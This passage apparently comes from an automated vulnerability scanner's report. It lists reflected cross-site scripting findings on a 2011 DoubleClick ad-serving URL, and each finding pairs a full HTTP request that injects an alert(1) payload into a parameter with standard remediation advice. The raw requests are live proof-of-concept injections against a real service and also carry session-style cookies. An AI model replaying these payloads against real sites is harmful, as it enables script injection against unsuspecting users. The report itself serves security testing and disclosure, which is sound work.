GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e14"-alert(1)-"d476ec4b721 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f831a"-alert(1)-"fd41ddc67fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8f4'-alert(1)-'4276b68460c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbc0"-alert(1)-"ba0ac0d227c was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec98'-alert(1)-'6c46995427c was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c129e'-alert(1)-'a18cc8e1ddf was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"-alert(1)-"b2ea1892855 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3537'-alert(1)-'9e6d81f8f7a was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f493"-alert(1)-"02b8d42dafa was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a9a7"-alert(1)-"ad0b1b525e8 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=1a9a7"-alert(1)-"ad0b1b525e8&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df1a'-alert(1)-'d8d0b082069 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b300"-alert(1)-"46531bd7138 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfcb1'-alert(1)-'a9d20cd76d8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c9c'-alert(1)-'3c148c4423f was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0530"-alert(1)-"a006e1efd34 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e91'-alert(1)-'f91892f526a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
